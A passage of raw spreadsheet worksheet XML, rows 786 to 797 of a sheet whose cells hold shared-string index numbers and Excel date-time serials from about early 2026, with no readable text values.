        <v>8405</v>
      </c>
      <c r="O786" s="23"/>
      <c r="P786" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q786" s="23"/>
      <c r="R786" s="23" t="s">
        <v>8509</v>
      </c>
      <c r="S786" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="T786" s="23"/>
      <c r="U786" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V786" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W786" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X786" s="23" t="s">
        <v>8499</v>
      </c>
      <c r="Y786" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z786" s="24">
        <v>46078.7296759259</v>
      </c>
      <c r="AA786" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB786" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC786" s="23"/>
      <c r="AD786" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE786" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF786" s="23"/>
      <c r="AG786" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH786" s="24">
        <v>46078.7297106481</v>
      </c>
      <c r="AI786" s="23"/>
      <c r="AJ786" s="23"/>
      <c r="AK786" s="23"/>
      <c r="AL786" s="23"/>
      <c r="AM786" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN786" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO786" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP786" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ786" s="24">
        <v>46078.7505092593</v>
      </c>
      <c r="AR786" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS786" s="23"/>
      <c r="AT786" s="23"/>
      <c r="AU786" s="23"/>
    </row>
    <row r="787" s="1" customFormat="1" spans="1:47">
      <c r="A787" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B787" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C787" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="D787" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E787" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F787" s="23" t="s">
        <v>9914</v>
      </c>
      <c r="G787" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H787" s="23"/>
      <c r="I787" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J787" s="23" t="s">
        <v>9915</v>
      </c>
      <c r="K787" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L787" s="24">
        <v>46079.7073611111</v>
      </c>
      <c r="M787" s="24">
        <v>46079.7073611111</v>
      </c>
      <c r="N787" s="23"/>
      <c r="O787" s="23"/>
      <c r="P787" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q787" s="23"/>
      <c r="R787" s="23" t="s">
        <v>9916</v>
      </c>
      <c r="S787" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="T787" s="23"/>
      <c r="U787" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V787" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W787" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X787" s="23" t="s">
        <v>8471</v>
      </c>
      <c r="Y787" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z787" s="24">
        <v>46079.7075925926</v>
      </c>
      <c r="AA787" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB787" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC787" s="23"/>
      <c r="AD787" s="23" t="s">
        <v>8462</v>
      </c>
      <c r="AE787" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF787" s="23"/>
      <c r="AG787" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH787" s="24">
        <v>46079.7076273148</v>
      </c>
      <c r="AI787" s="23"/>
      <c r="AJ787" s="23"/>
      <c r="AK787" s="23"/>
      <c r="AL787" s="23"/>
      <c r="AM787" s="23" t="s">
        <v>8463</v>
      </c>
      <c r="AN787" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO787" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP787" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ787" s="24">
        <v>46079.7284259259</v>
      </c>
      <c r="AR787" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS787" s="23"/>
      <c r="AT787" s="23"/>
      <c r="AU787" s="23"/>
    </row>
    <row r="788" s="1" customFormat="1" spans="1:47">
      <c r="A788" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B788" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C788" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="D788" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E788" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F788" s="23" t="s">
        <v>9917</v>
      </c>
      <c r="G788" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H788" s="23"/>
      <c r="I788" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J788" s="23" t="s">
        <v>8497</v>
      </c>
      <c r="K788" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L788" s="24">
        <v>46079.6978125</v>
      </c>
      <c r="M788" s="24">
        <v>46079.7066550926</v>
      </c>
      <c r="N788" s="23" t="s">
        <v>9292</v>
      </c>
      <c r="O788" s="23"/>
      <c r="P788" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q788" s="23"/>
      <c r="R788" s="23" t="s">
        <v>8509</v>
      </c>
      <c r="S788" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="T788" s="23"/>
      <c r="U788" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V788" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W788" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X788" s="23" t="s">
        <v>8499</v>
      </c>
      <c r="Y788" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z788" s="24">
        <v>46079.6988773148</v>
      </c>
      <c r="AA788" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB788" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC788" s="23"/>
      <c r="AD788" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE788" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF788" s="23"/>
      <c r="AG788" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH788" s="24">
        <v>46079.698900463</v>
      </c>
      <c r="AI788" s="23"/>
      <c r="AJ788" s="23"/>
      <c r="AK788" s="23"/>
      <c r="AL788" s="23"/>
      <c r="AM788" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN788" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO788" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP788" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ788" s="24">
        <v>46079.7197106481</v>
      </c>
      <c r="AR788" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS788" s="23"/>
      <c r="AT788" s="23"/>
      <c r="AU788" s="23"/>
    </row>
    <row r="789" s="1" customFormat="1" spans="1:47">
      <c r="A789" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B789" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C789" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D789" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E789" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F789" s="23" t="s">
        <v>9918</v>
      </c>
      <c r="G789" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H789" s="23"/>
      <c r="I789" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J789" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K789" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L789" s="24">
        <v>46079.692662037</v>
      </c>
      <c r="M789" s="24">
        <v>46079.6967476852</v>
      </c>
      <c r="N789" s="23" t="s">
        <v>9817</v>
      </c>
      <c r="O789" s="23"/>
      <c r="P789" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q789" s="23"/>
      <c r="R789" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="S789" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T789" s="23"/>
      <c r="U789" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V789" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W789" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X789" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y789" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z789" s="24">
        <v>46079.6928587963</v>
      </c>
      <c r="AA789" s="23"/>
      <c r="AB789" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC789" s="23"/>
      <c r="AD789" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE789" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF789" s="23"/>
      <c r="AG789" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH789" s="24">
        <v>46079.6928935185</v>
      </c>
      <c r="AI789" s="23"/>
      <c r="AJ789" s="23"/>
      <c r="AK789" s="23"/>
      <c r="AL789" s="23"/>
      <c r="AM789" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN789" s="23"/>
      <c r="AO789" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP789" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ789" s="24">
        <v>46079.7136921296</v>
      </c>
      <c r="AR789" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS789" s="23"/>
      <c r="AT789" s="23"/>
      <c r="AU789" s="23"/>
    </row>
    <row r="790" s="1" customFormat="1" spans="1:47">
      <c r="A790" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B790" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C790" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D790" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E790" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F790" s="23" t="s">
        <v>9919</v>
      </c>
      <c r="G790" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H790" s="23"/>
      <c r="I790" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J790" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K790" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L790" s="24">
        <v>46079.6503703704</v>
      </c>
      <c r="M790" s="24">
        <v>46079.6503703704</v>
      </c>
      <c r="N790" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O790" s="23"/>
      <c r="P790" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q790" s="23"/>
      <c r="R790" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S790" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T790" s="23"/>
      <c r="U790" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V790" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W790" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X790" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y790" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z790" s="24">
        <v>46079.6511921296</v>
      </c>
      <c r="AA790" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB790" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC790" s="23"/>
      <c r="AD790" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE790" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF790" s="23"/>
      <c r="AG790" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH790" s="24">
        <v>46079.6512268518</v>
      </c>
      <c r="AI790" s="23"/>
      <c r="AJ790" s="23"/>
      <c r="AK790" s="23"/>
      <c r="AL790" s="23"/>
      <c r="AM790" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN790" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO790" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP790" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ790" s="24">
        <v>46079.672025463</v>
      </c>
      <c r="AR790" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS790" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT790" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU790" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="791" s="1" customFormat="1" spans="1:47">
      <c r="A791" s="23" t="s">
        <v>8399</v>
      </c>
      <c r="B791" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C791" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D791" s="23" t="s">
        <v>8401</v>
      </c>
      <c r="E791" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F791" s="23" t="s">
        <v>9920</v>
      </c>
      <c r="G791" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H791" s="23"/>
      <c r="I791" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J791" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K791" s="23" t="s">
        <v>8404</v>
      </c>
      <c r="L791" s="24">
        <v>46078.6277083333</v>
      </c>
      <c r="M791" s="24">
        <v>46079.6256597222</v>
      </c>
      <c r="N791" s="23" t="s">
        <v>8666</v>
      </c>
      <c r="O791" s="23"/>
      <c r="P791" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q791" s="23"/>
      <c r="R791" s="23" t="s">
        <v>8564</v>
      </c>
      <c r="S791" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T791" s="23"/>
      <c r="U791" s="23" t="s">
        <v>8406</v>
      </c>
      <c r="V791" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W791" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X791" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y791" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z791" s="24">
        <v>46078.6285763889</v>
      </c>
      <c r="AA791" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB791" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC791" s="23"/>
      <c r="AD791" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE791" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF791" s="23"/>
      <c r="AG791" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH791" s="24">
        <v>46078.628599537</v>
      </c>
      <c r="AI791" s="23"/>
      <c r="AJ791" s="23"/>
      <c r="AK791" s="23" t="s">
        <v>9921</v>
      </c>
      <c r="AL791" s="23" t="s">
        <v>8411</v>
      </c>
      <c r="AM791" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN791" s="23" t="s">
        <v>8412</v>
      </c>
      <c r="AO791" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP791" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ791" s="24">
        <v>46078.6494097222</v>
      </c>
      <c r="AR791" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS791" s="23"/>
      <c r="AT791" s="23"/>
      <c r="AU791" s="23"/>
    </row>
    <row r="792" s="1" customFormat="1" spans="1:47">
      <c r="A792" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B792" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C792" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D792" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E792" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F792" s="23" t="s">
        <v>9922</v>
      </c>
      <c r="G792" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H792" s="23"/>
      <c r="I792" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J792" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K792" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L792" s="24">
        <v>46079.6205902778</v>
      </c>
      <c r="M792" s="24">
        <v>46079.6205902778</v>
      </c>
      <c r="N792" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O792" s="23"/>
      <c r="P792" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q792" s="23"/>
      <c r="R792" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S792" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T792" s="23"/>
      <c r="U792" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V792" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W792" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X792" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y792" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z792" s="24">
        <v>46079.6208912037</v>
      </c>
      <c r="AA792" s="23"/>
      <c r="AB792" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC792" s="23"/>
      <c r="AD792" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE792" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF792" s="23"/>
      <c r="AG792" s="25" t="s">
        <v>8439</v>
      </c>
      <c r="AH792" s="24">
        <v>46079.6209490741</v>
      </c>
      <c r="AI792" s="23"/>
      <c r="AJ792" s="23"/>
      <c r="AK792" s="23"/>
      <c r="AL792" s="23"/>
      <c r="AM792" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN792" s="23"/>
      <c r="AO792" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP792" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ792" s="24">
        <v>46079.641724537</v>
      </c>
      <c r="AR792" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS792" s="23"/>
      <c r="AT792" s="23"/>
      <c r="AU792" s="23"/>
    </row>
    <row r="793" s="1" customFormat="1" spans="1:47">
      <c r="A793" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B793" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C793" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D793" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E793" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F793" s="23" t="s">
        <v>9923</v>
      </c>
      <c r="G793" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H793" s="23"/>
      <c r="I793" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J793" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K793" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L793" s="24">
        <v>46079.585150463</v>
      </c>
      <c r="M793" s="24">
        <v>46079.585150463</v>
      </c>
      <c r="N793" s="23" t="s">
        <v>9817</v>
      </c>
      <c r="O793" s="23"/>
      <c r="P793" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q793" s="23"/>
      <c r="R793" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="S793" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T793" s="23"/>
      <c r="U793" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V793" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W793" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X793" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y793" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z793" s="24">
        <v>46079.5854166667</v>
      </c>
      <c r="AA793" s="23"/>
      <c r="AB793" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC793" s="23"/>
      <c r="AD793" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE793" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF793" s="23"/>
      <c r="AG793" s="25" t="s">
        <v>8455</v>
      </c>
      <c r="AH793" s="24">
        <v>46079.5855208333</v>
      </c>
      <c r="AI793" s="23"/>
      <c r="AJ793" s="23"/>
      <c r="AK793" s="23"/>
      <c r="AL793" s="23"/>
      <c r="AM793" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN793" s="23"/>
      <c r="AO793" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP793" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ793" s="24">
        <v>46079.60625</v>
      </c>
      <c r="AR793" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS793" s="23"/>
      <c r="AT793" s="23"/>
      <c r="AU793" s="23"/>
    </row>
    <row r="794" s="1" customFormat="1" spans="1:47">
      <c r="A794" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B794" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C794" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="D794" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E794" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F794" s="23" t="s">
        <v>9924</v>
      </c>
      <c r="G794" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H794" s="23"/>
      <c r="I794" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J794" s="23" t="s">
        <v>9372</v>
      </c>
      <c r="K794" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L794" s="24">
        <v>46079.5788773148</v>
      </c>
      <c r="M794" s="24">
        <v>46079.5798611111</v>
      </c>
      <c r="N794" s="23"/>
      <c r="O794" s="23"/>
      <c r="P794" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q794" s="23"/>
      <c r="R794" s="23" t="s">
        <v>9925</v>
      </c>
      <c r="S794" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="T794" s="23"/>
      <c r="U794" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V794" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W794" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X794" s="23" t="s">
        <v>8471</v>
      </c>
      <c r="Y794" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z794" s="24">
        <v>46079.5791087963</v>
      </c>
      <c r="AA794" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB794" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC794" s="23"/>
      <c r="AD794" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE794" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF794" s="23"/>
      <c r="AG794" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH794" s="24">
        <v>46079.5791319444</v>
      </c>
      <c r="AI794" s="23"/>
      <c r="AJ794" s="23"/>
      <c r="AK794" s="23"/>
      <c r="AL794" s="23"/>
      <c r="AM794" s="23" t="s">
        <v>8463</v>
      </c>
      <c r="AN794" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO794" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP794" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ794" s="24">
        <v>46079.5999421296</v>
      </c>
      <c r="AR794" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS794" s="23"/>
      <c r="AT794" s="23"/>
      <c r="AU794" s="23"/>
    </row>
    <row r="795" s="1" customFormat="1" spans="1:47">
      <c r="A795" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B795" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C795" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D795" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E795" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F795" s="23" t="s">
        <v>9926</v>
      </c>
      <c r="G795" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H795" s="23"/>
      <c r="I795" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J795" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K795" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L795" s="24">
        <v>46079.486724537</v>
      </c>
      <c r="M795" s="24">
        <v>46079.486724537</v>
      </c>
      <c r="N795" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O795" s="23"/>
      <c r="P795" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q795" s="23"/>
      <c r="R795" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S795" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T795" s="23"/>
      <c r="U795" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V795" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W795" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X795" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y795" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z795" s="24">
        <v>46079.486875</v>
      </c>
      <c r="AA795" s="23"/>
      <c r="AB795" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC795" s="23"/>
      <c r="AD795" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE795" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF795" s="23"/>
      <c r="AG795" s="25" t="s">
        <v>8567</v>
      </c>
      <c r="AH795" s="24">
        <v>46079.4869560185</v>
      </c>
      <c r="AI795" s="23"/>
      <c r="AJ795" s="23"/>
      <c r="AK795" s="23"/>
      <c r="AL795" s="23"/>
      <c r="AM795" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN795" s="23"/>
      <c r="AO795" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP795" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ795" s="24">
        <v>46079.5077083333</v>
      </c>
      <c r="AR795" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS795" s="23"/>
      <c r="AT795" s="23"/>
      <c r="AU795" s="23"/>
    </row>
    <row r="796" s="1" customFormat="1" spans="1:47">
      <c r="A796" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B796" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C796" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D796" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E796" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F796" s="23" t="s">
        <v>9927</v>
      </c>
      <c r="G796" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H796" s="23"/>
      <c r="I796" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J796" s="23" t="s">
        <v>8383</v>
      </c>
      <c r="K796" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L796" s="24">
        <v>46079.4455787037</v>
      </c>
      <c r="M796" s="24">
        <v>46079.4455787037</v>
      </c>
      <c r="N796" s="23" t="s">
        <v>9817</v>
      </c>
      <c r="O796" s="23"/>
      <c r="P796" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q796" s="23"/>
      <c r="R796" s="23" t="s">
        <v>9928</v>
      </c>
      <c r="S796" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T796" s="23"/>
      <c r="U796" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V796" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W796" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X796" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y796" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z796" s="24">
        <v>46079.4460416667</v>
      </c>
      <c r="AA796" s="23"/>
      <c r="AB796" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC796" s="23"/>
      <c r="AD796" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE796" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF796" s="23"/>
      <c r="AG796" s="25" t="s">
        <v>8475</v>
      </c>
      <c r="AH796" s="24">
        <v>46079.446087963</v>
      </c>
      <c r="AI796" s="23"/>
      <c r="AJ796" s="23"/>
      <c r="AK796" s="23"/>
      <c r="AL796" s="23"/>
      <c r="AM796" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN796" s="23"/>
      <c r="AO796" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP796" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ796" s="24">
        <v>46079.466875</v>
      </c>
      <c r="AR796" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS796" s="23"/>
      <c r="AT796" s="23"/>
      <c r="AU796" s="23"/>
    </row>
    <row r="797" s="1" customFormat="1" spans="1:47">
      <c r="A797" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B797" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C797" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D797" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E797" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F797" s="23" t="s">
        <v>9929</v>
      </c>
      <c r="G797" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H797" s="23"/>
      <c r="I797" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J797" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K797" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L797" s="24">
        <v>46079.4362384259</v>
      </c>
      <c r="M797" s="24">
        <v>46079.4388078704</v>
      </c>
      <c r="N797" s="23" t="s">
        <v>9292</v>
      </c>
      <c r="O797" s="23"/>
      <c r="P797" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q797" s="23"/>
      <c r="R797" s="23" t="s">
        <v>1698</v>
      </c>
      <c r="S797" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T797" s="23"/>
      <c r="U797" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V797" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W797" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X797" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y797" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z797" s="24">
        <v>46079.4364930556</v>
      </c>
